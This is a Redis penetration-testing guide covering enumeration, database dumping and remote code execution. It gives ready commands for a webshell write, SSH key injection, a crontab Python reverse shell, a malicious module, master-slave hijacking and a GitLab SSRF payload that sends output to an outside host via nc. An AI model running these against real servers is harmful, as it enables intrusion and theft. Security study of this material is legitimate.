# 6379 - Pentesting Redis ## Basic Information Redis is an open source \(BSD licensed\), in-memory **data structure store**, used as a **database**, cache and message broker \(from [here](https://redis.io/topics/introduction)\). By default and commonly Redis uses a plain-text based protocol, but you have to keep in mind that it can also implement **ssl/tls**. Learn how to [run Redis with ssl/tls here](https://fossies.org/linux/redis/TLS.md). **Default port:** 6379 ```text PORT STATE SERVICE VERSION 6379/tcp open redis Redis key-value store 4.0.9 ``` ## Automatic Enumeration Some automated tools that can help to obtain info from a redis instance: ```bash nmap --script redis-info -sV -p 6379 msf> use auxiliary/scanner/redis/redis_server ``` ## Manual Enumeration ### Banner Redis is a **text based protocol**, you can just **send the command in a socket** and the returned values will be readable. Also remember that Redis can run using **ssl/tls** \(but this is very weird\). In a regular Redis instance you can just connect using `nc` or you could also use `redis-cli`: ```bash nc -vn 10.10.10.10 6379 redis-cli -h 10.10.10.10 # sudo apt-get install redis-tools ``` The **first command** you could try is **`info`**. It **may return output with information** of the Redis instance **or something** like the following is returned: ```text -NOAUTH Authentication required. ``` In this last case, this means that **you need valid credentials** to access the Redis instance. ### Redis Authentication **By default** Redis can be accessed **without credentials**. However, it can be **configured** to support **only password, or username + password**. It is possible to **set a password** in _**redis.conf**_ file with the parameter `requirepass` **or temporary** until the service restarts connecting to it and running: `config set requirepass p@ss$12E45`. Also, a **username** can be configured in the parameter `masteruser` inside the _**redis.conf**_ file. {% hint style="info" %} If only password is configured the username used is "**default**". Also, note that there is **no way to find externally** if Redis was configured with only password or username+password. {% endhint %} In cases like this one you will **need to find valid credentials** to interact with Redis so you could try to [**brute-force**](../brute-force.md#redis) ****it. In case you found valid credentials you need to **authenticate the session** after establishing the connection with the command: ```bash AUTH ``` **Valid credentials** will be responded with: `+OK` ### **Authenticated enumeration** If the Redis instance is accepting **anonymous** connections or you found some **valid credentials**, you can **start enumerating** the service with the following commands: ```bash INFO [ ... Redis response with info ... ] client list [ ... Redis response with connected clients ... ] CONFIG GET * [ ... Get config ... ] ``` **Other Redis commands** [**can be found here**](https://redis.io/topics/data-types-intro) **and** [**here**](https://lzone.de/cheat-sheet/Redis)**.** Note that the **Redis commands of an instance can be renamed** or removed in the _redis.conf_ file. For example this line will remove the command FLUSHDB: ```text rename-command FLUSHDB "" ``` More about configuring securely a Redis service here: [https://www.digitalocean.com/community/tutorials/how-to-install-and-secure-redis-on-ubuntu-18-04](https://www.digitalocean.com/community/tutorials/how-to-install-and-secure-redis-on-ubuntu-18-04) You can also **monitor in real time the Redis commands** executed with the command **`monitor`** or get the top **25 slowest queries** with **`slowlog get 25`** Find more interesting information about more Redis commands here: [https://lzone.de/cheat-sheet/Redis](https://lzone.de/cheat-sheet/Redis) ### **Dumping Database** Inside Redis the **databases are numbers starting from 0**. You can find if anyone is used in the output of the command `info` inside the "Keyspace" chunk: ![](../.gitbook/assets/image%20%28346%29.png) In that example the **database 0 and 1** are being used. **Database 0 contains 4 keys and database 1 contains 1**. By default Redis will use database 0. In order to dump for example database 1 you need to do: ```bash SELECT 1 [ ... Indicate the database ... ] KEYS * [ ... Get Keys ... ] GET [ ... Get Key ... ] ``` **Dump the database with npm**[ **redis-dump**](https://www.npmjs.com/package/redis-dump) **or python** [**redis-utils**](https://pypi.org/project/redis-utils/)\*\*\*\* ## Redis RCE ### Webshell From: [http://reverse-tcp.xyz/pentest/database/2017/02/09/Redis-Hacking-Tips.html](http://reverse-tcp.xyz/pentest/database/2017/02/09/Redis-Hacking-Tips.html) You must know the **path** of the **Web site folder**: ```text root@Urahara:~# redis-cli -h 10.85.0.52 10.85.0.52:6379> config set dir /usr/share/nginx/html OK 10.85.0.52:6379> config set dbfilename redis.php OK 10.85.0.52:6379> set test "" OK 10.85.0.52:6379> save OK ``` ​If the webshell access exception, you can empty the database after backup and try again, remember to restore the database. ### SSH In the output of **`config get *`** you could find the **home** of the **redis user** \(usually _/var/lib/redis_ or _/home/redis/.ssh_\), and knowing this you know where you can write the `authenticated_users` file to access via ssh **with the user redis**. If you know the home of other valid user where you have writable permissions you can also abuse it: 1. Generate a ssh public-private key pair on your pc: **`ssh-keygen -t rsa`** 2. Write the public key to a file : **`(echo -e "\n\n"; cat ./.ssh/id_rsa.pub; echo -e "\n\n") > foo.txt`** 3. Import the file into redis : **`cat foo.txt | redis-cli -h 10.85.0.52 -x set crackit`** 4. Save the public key to the **authorized\_keys** file on redis server: ```text root@Urahara:~# redis-cli -h 10.85.0.52 10.85.0.52:6379> config set dir /home/test/.ssh/ OK 10.85.0.52:6379> config set dbfilename "authorized_keys" OK 10.85.0.52:6379> save OK ``` 5. Finally, you can **ssh** to the **redis server** with private key : **ssh -i id\_rsa test@10.85.0.52** **This technique is automated here:** [https://github.com/Avinash-acid/Redis-Server-Exploit](https://github.com/Avinash-acid/Redis-Server-Exploit) ### Crontab ```text root@Urahara:~# echo -e "\n\n*/1 * * * * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.85.0.53\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n\n"|redis-cli -h 10.85.0.52 -x set 1 OK root@Urahara:~# redis-cli -h 10.85.0.52 config set dir /var/spool/cron/crontabs/ OK root@Urahara:~# redis-cli -h 10.85.0.52 config set dbfilename root OK root@Urahara:~# redis-cli -h 10.85.0.52 save OK ``` The last exampleis for Ubuntu, for **Centos**, the above command should be: `redis-cli -h 10.85.0.52 config set dir /var/spool/cron/` This method can also be used to earn bitcoin :[yam](https://www.v2ex.com/t/286981#reply14) ### Load Redis Module 1. Following the instructions from [https://github.com/n0b0dyCN/RedisModules-ExecuteCommand](https://github.com/n0b0dyCN/RedisModules-ExecuteCommand) you can **compile a redis module to execute arbitrary commands**. 2. Then you need some way to **upload the compiled** module 3. **Load the uploaded module** at runtime with `MODULE LOAD /path/to/mymodule.so` 4. **List loaded modules** to check it was correctly loaded: `MODULE LIST` 5. **Execute** **commands**: ```text 127.0.0.1:6379> system.exec "id" "uid=0(root) gid=0(root) groups=0(root)\n" 127.0.0.1:6379> system.exec "whoami" "root\n" 127.0.0.1:6379> system.rev 127.0.0.1 9999 ``` 6. Unload the module whenever you want: `MODULE UNLOAD mymodule` ### LUA sandbox bypass [**Here**](https://www.agarri.fr/blog/archives/2014/09/11/trying_to_hack_redis_via_http_requests/index.html) you can see that Redis uses the command **EVAL** to execute **Lua code sandboxed**. In the linked post you can see **how to abuse it** using the **dotfile** function, but [apparently](https://stackoverflow.com/questions/43502696/redis-cli-code-execution-using-eval) this isn't no longer possible. Anyway, if you can **bypass the Lua** sandbox you could **execute arbitrary** commas on the system. Also, from the same post you can see some **options to cause DoS**. ### Master-Slave Module ​The master redis all operations are automatically synchronized to the slave redis, which means that we can regard the vulnerability redis as a slave redis, connected to the master redis which our own controlled, then we can enter the command to our own redis. ```text master redis : 10.85.0.51 (Hacker's Server) slave redis : 10.85.0.52 (Target Vulnerability Server) A master-slave connection will be established from the slave redis and the master redis: redis-cli -h 10.85.0.52 -p 6379 slaveof 10.85.0.51 6379 Then you can login to the master redis to control the slave redis: redis-cli -h 10.85.0.51 -p 6379 set mykey hello set mykey2 helloworld ``` ## SSRF talking to Redis If you can send **clear text** request **to Redis**, you can **communicate with it** as Redis will read line by line the request and just respond with errors to the lines it doesn't understand: ```text -ERR wrong number of arguments for 'get' command -ERR unknown command 'Host:' -ERR unknown command 'Accept:' -ERR unknown command 'Accept-Encoding:' -ERR unknown command 'Via:' -ERR unknown command 'Cache-Control:' -ERR unknown command 'Connection:' ``` Therefore, if you find a **SSRF vuln** in a website and you can **control** some **headers** \(maybe with a CRLF vuln\) or **POST parameters**, you will be able to send arbitrary commands to Redis. ### Example: Gitlab SSRF + CRLF to Shell In **Gitlab11.4.7** were discovered a **SSRF** vulnerability and a **CRLF**. The **SSRF** vulnerability was in the **import project from URL functionality** when creating a new project and allowed to access arbitrary IPs in the form \[0:0:0:0:0:ffff:127.0.0.1\] \(this will access 127.0.0.1\), and the **CRLF** vuln was exploited just **adding %0D%0A** characters to the **URL**. Therefore, it was possible to **abuse these vulnerabilities to talk to the Redis instance** that **manages queues** from **gitlab** and abuse those queues to **obtain code execution**. The Redis queue abuse payload is: ```text multi sadd resque:gitlab:queues system_hook_push lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|whoami | nc 192.241.233.143 80\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}" exec ``` And the **URL encode** request **abusing SSRF** and **CRLF** to execute a `whoami` and send back the output via `nc` is: ```text git://[0:0:0:0:0:ffff:127.0.0.1]:6379/%0D%0A%20multi%0D%0A%20sadd%20resque%3Agitlab%3Aqueues%20system%5Fhook%5Fpush%0D%0A%20lpush%20resque%3Agitlab%3Aqueue%3Asystem%5Fhook%5Fpush%20%22%7B%5C%22class%5C%22%3A%5C%22GitlabShellWorker%5C%22%2C%5C%22args%5C%22%3A%5B%5C%22class%5Feval%5C%22%2C%5C%22open%28%5C%27%7Ccat%20%2Fflag%20%7C%20nc%20127%2E0%2E0%2E1%202222%5C%27%29%2Eread%5C%22%5D%2C%5C%22retry%5C%22%3A3%2C%5C%22queue%5C%22%3A%5C%22system%5Fhook%5Fpush%5C%22%2C%5C%22jid%5C%22%3A%5C%22ad52abc5641173e217eb2e52%5C%22%2C%5C%22created%5Fat%5C%22%3A1513714403%2E8122594%2C%5C%22enqueued%5Fat%5C%22%3A1513714403%2E8129568%7D%22%0D%0A%20exec%0D%0A%20exec%0D%0A/ssrf123321.git ``` _For some reason \(as for the author of_ [_https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/_](https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/) _where this info was took from\) the exploitation worked with the `git` scheme and not with the `http` scheme._